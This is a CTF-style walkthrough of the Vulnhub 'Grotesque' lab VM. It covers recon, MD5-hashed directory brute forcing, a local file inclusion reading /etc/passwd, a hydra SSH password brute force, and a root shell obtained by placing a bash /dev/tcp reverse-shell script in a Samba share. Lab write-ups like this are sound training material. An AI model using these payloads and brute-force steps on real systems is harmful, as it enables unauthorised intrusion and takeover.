Vulnhub Grotesque: detailed walkthrough

Grotesque

Identifying the target host's IP address

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.103.0/16   |   Screen View: Unique Hosts                                          
                                                                                                               
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:6e:ae:83      2     120  PCS Systemtechnik GmbH                                      
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                              
 192.168.56.102  08:00:27:3c:13:24      1      60  PCS Systemtechnik GmbH  

Using netdiscover, which ships with Kali Linux, the target host is identified as 192.168.56.102 (the other two VirtualBox addresses are the host-only adapter and its DHCP server).

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.102 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 00:37 EDT
Nmap scan report for bogon (192.168.56.102)
Host is up (0.00073s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:3C:13:24 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.97 seconds

Nmap finds two open ports: 22 (OpenSSH 7.9p1) and 80 (Apache httpd 2.4.38); the banners identify the OS as Debian 10. The other 65533 ports come back as filtered (no response) rather than closed, which points to a host firewall dropping packets. Keep that in mind: services that listen on the box but are blocked from outside, or bound only to loopback, will not show up in this scan.

Information gathering and vulnerability discovery

The SSH version running on the target has no obviously exploitable vulnerability, so this phase focuses on the HTTP service.

Fetch the target's HTTP service:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ curl http://192.168.56.102                                       
<!DOCTYPE html>
<html>
<body>
<style>
body {
background-image: url('gigachad.png');
background-repeat: no-repeat;
background-size: cover; }

@font-face {
    font-family: Segoe;
    src: url('segoeui.ttf');
}

.mainfo {
  text-align: center;
  border: 1px solid #000000;
  font-family: 'Segoe';
  padding: 5px;
  background-color: #ffffff;
  margin-top: 300px;
}

.emoji {
        width: 32px;
        }
</style>
<div class="mainfo">
<br>my child,<br>
<br>why don't you look your <a href="atlasg.jpg">atlas<a>?<br>
<br>it will lighten your way.<br><br>
</body>
</html>

The site has no robots.txt:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ curl http://192.168.56.102/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.102 Port 80</address>
</body></html>

The homepage source links to an image (atlasg.jpg); download it and check it for embedded data with steghide:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ wget http://192.168.56.102/atlasg.jpg                                               
--2022-10-24 00:58:40--  http://192.168.56.102/atlasg.jpg
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2513334 (2.4M) [image/jpeg]
Saving to: ‘atlasg.jpg’

atlasg.jpg                  100%[===========================================>]   2.40M  --.-KB/s    in 0.04s   

2022-10-24 00:58:40 (68.2 MB/s) - ‘atlasg.jpg’ saved [2513334/2513334]

                                                                                                                
┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ ls
atlasg.jpg  nmap_full_scan
                                                                                                                
┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ steghide extract -sf atlasg.jpg                            
Enter passphrase: 
                            

steghide asks for a passphrase; try brute-forcing it with stegseek against rockyou.txt:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ stegseek atlasg.jpg /usr/share/wordlists/rockyou.txt -xf output 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.78% (133.1 MB)           
[!] error: Could not find a valid passphrase.

stegseek fails, so park this direction for now and enumerate web directories first:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ gobuster dir -u http://192.168.56.102 -w  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.102
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/24 01:02:02 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
                                               
===============================================================
2022/10/24 01:02:45 Finished
===============================================================

The only hit, /server-status, returns 403 (Apache's status page, as expected); nothing useful there.

According to other writeups, the hint is in the downloaded image itself: zoomed in, it shows the letters "m d", pointing at MD5 hashes, i.e. the file and directory names are MD5 hashes of ordinary words (so examine every image carefully, and at full size).

So generate a wordlist of MD5-hashed names and scan with gobuster again. Note that `echo $i | md5sum` hashes the word plus a trailing newline (echo -n would hash the bare word); the convention the challenge author used has to be matched, and this one worked here:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ for i in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt ); do echo $i | md5sum >> dirmd5.txt;done

The resulting file needs cleaning up: md5sum prints each hash followed by two spaces and a "-" (its name for stdin), and every line still ends with a newline. A short Python script does it. I first tried strip('-') and it seemed not to work; the reason is that the trailing '\n' comes after the '-', so strip('-') finds nothing to remove at either end of the line. replace('-', '') followed by strip(), or simply keeping the first whitespace-separated field, works:

# dirmd5.txt lines look like "<32 hex chars>  -": md5sum prints the hash followed by
# two spaces and "-" (its name for stdin). Keep only the hash, i.e. the first
# whitespace-separated field, and write one per line.
with open('dirmd5.txt') as f, open('dirwordlist.txt', 'w') as g:
    for line in f:
        fields = line.split()
        if not fields:          # skip blank lines
            continue
        g.write(fields[0] + '\n')
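As an added example (my own code, not from the original writeup), the two steps above can be done in one Python script. It hashes each word both the way `echo` does (with a trailing newline) and the way `echo -n` does (without), since a challenge author may have used either, and it skips the comment lines at the top of the DirBuster lists. The mini wordlist in the `__main__` block is constructed for illustration.

```python
# Added example, not code from the original writeup: build the MD5-hashed wordlist in
# one step instead of piping through md5sum and cleaning up the "  -" suffix afterwards.
import hashlib


def md5_hex(word, trailing_newline=True):
    """MD5 of a word. `echo word | md5sum` hashes "word\n"; `echo -n` hashes "word".
    Both conventions turn up in CTF challenges, so the caller chooses."""
    data = word + ("\n" if trailing_newline else "")
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def md5_wordlist(words, both_conventions=True):
    """Return the candidate hashes, deduplicated and in input order.
    With both_conventions=True each word yields the newline and no-newline variants,
    which doubles the list but avoids guessing how the challenge author hashed."""
    seen, out = set(), []
    for raw in words:
        word = raw.rstrip("\r\n")
        if not word or word.startswith("#"):       # DirBuster lists start with comments
            continue
        variants = [True, False] if both_conventions else [True]
        for nl in variants:
            h = md5_hex(word, nl)
            if h not in seen:
                seen.add(h)
                out.append(h)
    return out


def write_wordlist(src_path, dst_path, both_conventions=True):
    """Read a plain wordlist, write the hashed one, return the number of hashes written."""
    with open(src_path, encoding="utf-8", errors="ignore") as f:
        hashes = md5_wordlist(f, both_conventions)
    with open(dst_path, "w") as g:
        g.write("\n".join(hashes) + "\n")
    return len(hashes)


if __name__ == "__main__":
    # Constructed mini wordlist standing in for directory-list-lowercase-2.3-medium.txt
    sample = ["# comment line", "admin", "images", "", "password"]
    for h in md5_wordlist(sample):
        print(h)
```

For the real run, call write_wordlist('/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt', 'dirwordlist.txt'); the output is twice the length of the input, which costs gobuster a few extra minutes but saves a wrong guess about the hashing convention.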

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ gobuster dir -u http://192.168.56.102 -w  dirwordlist.txt -z -x .php,.html,.txt,.sh 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.102
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                dirwordlist.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,sh,php
[+] Timeout:                 10s
===============================================================
2022/10/24 01:54:13 Starting gobuster in directory enumeration mode
===============================================================
/f66b22bf020334b04c7d0d3eb5010391.php (Status: 200) [Size: 0]

gobuster finds one file: f66b22bf020334b04c7d0d3eb5010391.php

Requesting it returns HTTP 200 with an empty body (gobuster reported Size: 0) and no error, so it most likely expects a parameter.

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ curl http://192.168.56.102/f66b22bf020334b04c7d0d3eb5010391.php

Fuzz the parameter name with wfuzz, using a path-traversal payload as the value so that a correct name produces a non-empty response:

$ wfuzz -c -u 'http://192.168.56.102/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/big.txt --hh 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.102/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../etc/passwd
Total requests: 20476

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                        
=====================================================================

000014759:   200        27 L     40 W       1457 Ch     "purpose"  

--hh 0 hides responses with an empty body, which is what the script returns for every wrong parameter name. It helps to run wfuzz once without --hh to see what the baseline responses look like, and only then filter on that size.

The parameter is purpose; confirm that it reads arbitrary files:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ curl http://192.168.56.102/f66b22bf020334b04c7d0d3eb5010391.php?purpose=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
freddie:x:1000:1000:freddie,,,:/home/freddie:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false

This reveals one regular user, freddie. Use the LFI to try to read his SSH private key:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ curl http://192.168.56.102/f66b22bf020334b04c7d0d3eb5010391.php?purpose=../../../../../home/freddie/.ssh/id_rsa

Nothing comes back (either the file does not exist or www-data cannot read it). We do have a username now, so try brute-forcing freddie's SSH password with hydra:
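The parsing and follow-up that the writeup does by hand, as an added example (my code, not part of the original): keep the accounts from the LFI output that have a real login shell, build the same traversal URLs, and add one check the writeup did not run, a php://filter wrapper that returns the script's own source if the parameter reaches include()/require() rather than a plain file read. The host, script name and parameter are the ones found above; the passwd text is a constructed excerpt of the page's output.

```python
# Added example, not code from the original writeup: parse the /etc/passwd text the LFI
# returned, keep the accounts that can actually log in, and build the follow-up requests.
# Host, script and parameter name are the ones found above; the passwd text is a
# constructed excerpt of the page's output.
BASE = "http://192.168.56.102"
SCRIPT = "f66b22bf020334b04c7d0d3eb5010391.php"
PARAM = "purpose"

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
freddie:x:1000:1000:freddie,,,:/home/freddie:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
"""

NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def login_users(passwd_text):
    """(user, home) for every account whose shell allows an interactive login."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:          # blank or malformed line: skip instead of crashing
            continue
        name, home, shell = fields[0], fields[5], fields[6]
        if shell and shell not in NON_LOGIN_SHELLS:
            users.append((name, home))
    return users


def candidate_files(users):
    """Per-user files worth requesting next through the LFI (keys, history)."""
    per_user = [".ssh/id_rsa", ".ssh/authorized_keys", ".bash_history"]
    return [f"{home.rstrip('/')}/{rel}" for _name, home in users for rel in per_user]


def lfi_url(base, script, param, target, depth=5):
    """Traversal URL in the same shape as the one used above: depth x '../' + path."""
    # '../' and '/' need no percent-encoding for this request, so the URL is built raw.
    payload = "../" * depth + target.lstrip("/")
    return f"{base}/{script}?{param}={payload}"


def source_disclosure_url(base, script, param):
    """A check the writeup did not run: if the parameter reaches include()/require(),
    the php://filter wrapper returns the script's own source base64-encoded instead of
    executing it. An empty reply suggests a plain file read (e.g. file_get_contents)."""
    resource = script.rsplit(".php", 1)[0]
    return f"{base}/{script}?{param}=php://filter/convert.base64-encode/resource={resource}"


if __name__ == "__main__":
    users = login_users(SAMPLE_PASSWD)
    for path in ["/etc/passwd"] + candidate_files(users):
        print(lfi_url(BASE, SCRIPT, PARAM, path))
    print(source_disclosure_url(BASE, SCRIPT, PARAM))
```

The printed URLs can be fed to curl one by one; a non-empty reply to the php://filter request would show which PHP function sits behind purpose and whether wrappers such as data:// or expect:// are even worth trying.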

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ hydra -l freddie -P /usr/share/wordlists/rockyou.txt 192.168.56.102 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-24 03:02:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.102:22/
[STATUS] 149.00 tries/min, 149 tries in 00:01h, 14344251 to do in 1604:31h, 15 active
[STATUS] 105.33 tries/min, 316 tries in 00:03h, 14344084 to do in 2269:39h, 15 active
[STATUS] 98.71 tries/min, 691 tries in 00:07h, 14343709 to do in 2421:46h, 15 active
[STATUS] 96.60 tries/min, 1449 tries in 00:15h, 14342951 to do in 2474:38h, 15 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

rockyou.txt does not crack it (and at roughly 100 tries per minute it would take years to exhaust anyway). Following other writeups, the idea is that the password is itself one of the MD5 hashes, so rerun hydra with the MD5 wordlist generated earlier; hydra's own warning about SSH connection limits suggests -t 4, which avoids lost attempts at the cost of speed:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ hydra -l freddie -P dirwordlist.txt 192.168.56.102 ssh 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-24 03:22:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 207698 login tries (l:1/p:207698), ~12982 tries per task
[DATA] attacking ssh://192.168.56.102:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 207572 to do in 27:02h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 207404 to do in 35:03h, 14 active
[STATUS] 92.29 tries/min, 646 tries in 00:07h, 207054 to do in 37:24h, 14 active
[STATUS] 92.13 tries/min, 1382 tries in 00:15h, 206318 to do in 37:20h, 14 active
[22][ssh] host: 192.168.56.102   login: freddie   password: 61a4e3e60c063d1e472dd780f64e6cad
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-24 03:47:10
                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Grotesque]

After a long wait it succeeds: freddie's password is 61a4e3e60c063d1e472dd780f64e6cad.

Exploit

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ ssh freddie@192.168.56.102                                     
The authenticity of host '192.168.56.102 (192.168.56.102)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.102' (ED25519) to the list of known hosts.
freddie@192.168.56.102's password: 
Linux grotesque 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
freddie@grotesque:~$ id
uid=1000(freddie) gid=1000(freddie) groups=1000(freddie),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
freddie@grotesque:~$ pwd
/home/freddie
freddie@grotesque:~$ cd /home
freddie@grotesque:/home$ cd /tmp

Upload LinEnum.sh to the target (served from Kali with Python's http.server) and run it:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ cp ~/Tools/linenum/LinEnum.sh .
                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.102 - - [24/Oct/2022 03:50:54] "GET /LinEnum.sh HTTP/1.1" 200 -


freddie@grotesque:/tmp$ chmod +x LinEnum.sh 
freddie@grotesque:/tmp$ ./LinEnum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Mon 24 Oct 2022 02:14:35 AM CDT                                                                                  
                                                                                                                 

### SYSTEM ##############################################
[-] Kernel information:
Linux grotesque 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.19.0-13-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.160-2 (2020-11-28)

LinEnum turns up nothing useful (output trimmed), so look at the local listening sockets instead:

freddie@grotesque:/tmp$ ss -tunlp
Netid       State        Recv-Q       Send-Q              Local Address:Port             Peer Address:Port       
udp         UNCONN       0            0                         0.0.0.0:68                    0.0.0.0:*          
udp         UNCONN       0            0                  192.168.56.255:137                   0.0.0.0:*          
udp         UNCONN       0            0                  192.168.56.102:137                   0.0.0.0:*          
udp         UNCONN       0            0                         0.0.0.0:137                   0.0.0.0:*          
udp         UNCONN       0            0                  192.168.56.255:138                   0.0.0.0:*          
udp         UNCONN       0            0                  192.168.56.102:138                   0.0.0.0:*          
udp         UNCONN       0            0                         0.0.0.0:138                   0.0.0.0:*          
tcp         LISTEN       0            50                        0.0.0.0:445                   0.0.0.0:*          
tcp         LISTEN       0            80                      127.0.0.1:3306                  0.0.0.0:*          
tcp         LISTEN       0            50                        0.0.0.0:139                   0.0.0.0:*          
tcp         LISTEN       0            128                       0.0.0.0:22                    0.0.0.0:*          
tcp         LISTEN       0            50                           [::]:445                      [::]:*          
tcp         LISTEN       0            50                           [::]:139                      [::]:*          
tcp         LISTEN       0            128                             *:80                          *:*          
freddie@grotesque:/tmp$ 

Locally the host also listens on 139 and 445 (Samba) on all interfaces and on 3306 (MySQL) on loopback only. None of these appeared in the Nmap scan, which only showed 22 and 80 and reported everything else as filtered: the Samba ports are blocked by a host firewall and MySQL is not reachable from outside at all. Both are therefore only attackable from this shell.
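An added check (my code, not the writeup's): parse the `ss -tunlp` listing and compare it with the ports Nmap reported open from outside, to classify what is hidden and why. The ss text below is a constructed excerpt of the output above; the Nmap set is the two ports from the earlier scan.

```python
# Added example, not part of the original writeup: compare what the host listens on
# (parsed from `ss -tunlp`) with the ports Nmap reported open from outside, so that
# services hidden by a host firewall or bound only to loopback stand out.

# Constructed sample: a trimmed copy of the ss output shown above.
SS_OUTPUT = """Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
udp   UNCONN 0      0            0.0.0.0:68        0.0.0.0:*
udp   UNCONN 0      0            0.0.0.0:137       0.0.0.0:*
tcp   LISTEN 0      50           0.0.0.0:445       0.0.0.0:*
tcp   LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*
tcp   LISTEN 0      50           0.0.0.0:139       0.0.0.0:*
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*
tcp   LISTEN 0      50              [::]:445          [::]:*
tcp   LISTEN 0      128                *:80             *:*
"""

NMAP_OPEN_TCP = {22, 80}   # what the external `nmap -p-` scan reported open
LOOPBACK = {"127.0.0.1", "[::1]", "::1"}


def parse_ss(text):
    """Return {(proto, port): set(bind addresses)} from `ss -tunlp` style output."""
    listeners = {}
    for line in text.splitlines()[1:]:           # first line is the header
        parts = line.split()
        if len(parts) < 5:
            continue
        proto, local = parts[0], parts[4]
        addr, _, port = local.rpartition(":")    # rpartition copes with "[::]:445"
        if not port.isdigit():
            continue
        listeners.setdefault((proto, int(port)), set()).add(addr)
    return listeners


def hidden_services(listeners, external_open, proto="tcp"):
    """Map each listening port the external scan did not report to a likely reason."""
    findings = {}
    for (p, port), addrs in sorted(listeners.items()):
        if p != proto or port in external_open:
            continue
        if addrs <= LOOPBACK:
            findings[port] = "bound to loopback only"
        else:
            findings[port] = "bound externally but not seen by Nmap: filtered by a host firewall?"
    return findings


if __name__ == "__main__":
    for port, why in hidden_services(parse_ss(SS_OUTPUT), NMAP_OPEN_TCP).items():
        print(f"tcp/{port}: {why}")
```

On this box the result lists 139 and 445 (Samba, firewalled from outside) and 3306 (MySQL, loopback only); the Samba share is the natural next thing to look at.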

freddie@grotesque:/tmp$ smbclient -L 127.0.0.1
Unable to initialize messaging context
Enter WORKGROUP\freddie's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        grotesque       Disk      grotesque
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            GROTESQUE
freddie@grotesque:/tmp$ smbclient //127.0.0.1/grotesque
Unable to initialize messaging context
Enter WORKGROUP\freddie's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 11 09:24:27 2021
  ..                                  D        0  Sun Jul 11 09:20:30 2021

                1942736 blocks of size 1024. 674116 blocks available
smb: \> 

The grotesque share is empty. Prepare a reverse-shell script on Kali (192.168.56.101 is the attacker's address; the original transcript named the file shell.php, but it is served and fetched as shell.sh) and pull it onto the target through the Python HTTP server that is still running:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ vim shell.sh
                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ cat shell.sh       
#!/bin/bash
bash -i >& /dev/tcp/192.168.56.101/8080 0>&1
freddie@grotesque:/tmp$ wget http://192.168.56.101:80/shell.sh
--2022-10-24 02:46:08--  http://192.168.56.101/shell.sh
Connecting to 192.168.56.101:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 57 [text/x-sh]
Saving to: ‘shell.sh’

shell.sh                     100%[===========================================>]      57  --.-KB/s    in 0s      

2022-10-24 02:46:08 (1.18 MB/s) - ‘shell.sh’ saved [57/57]

freddie@grotesque:/tmp$ ls
LinEnum.sh  systemd-private-663e4bd685f2461aa04259b7d07ebea9-apache2.service-bAb6Z1
shell.sh    systemd-private-663e4bd685f2461aa04259b7d07ebea9-systemd-timesyncd.service-UiDNAD
freddie@grotesque:/tmp$ chmod +x shell.sh
freddie@grotesque:/tmp$ 

From the target, "upload" shell.sh into the share over SMB. Something on the host then executes files dropped into that share with root privileges (the writeup does not show what; a root cron job is the usual setup for this kind of box), which hands us a root shell:

smb: \> put shell.sh
putting file shell.sh as \shell.sh (18.6 kb/s) (average 18.6 kb/s)
smb: \> ls
  .                                   D        0  Mon Oct 24 02:46:49 2022
  ..                                  D        0  Sun Jul 11 09:20:30 2021
  shell.sh                            A       57  Mon Oct 24 02:46:49 2022

                1942736 blocks of size 1024. 674112 blocks available
smb: \> 

The nc listener on Kali (it has to be running when the script gets executed) receives the connection:

┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ sudo nc -nlvp 8080    
[sudo] password for kali: 
listening on [any] 8080 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 39298
bash: cannot set terminal process group (4569): Inappropriate ioctl for device
bash: no job control in this shell
root@grotesque:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@grotesque:~# 

Root obtained.

posted @ 2022-10-24 16:51  Jason_huawen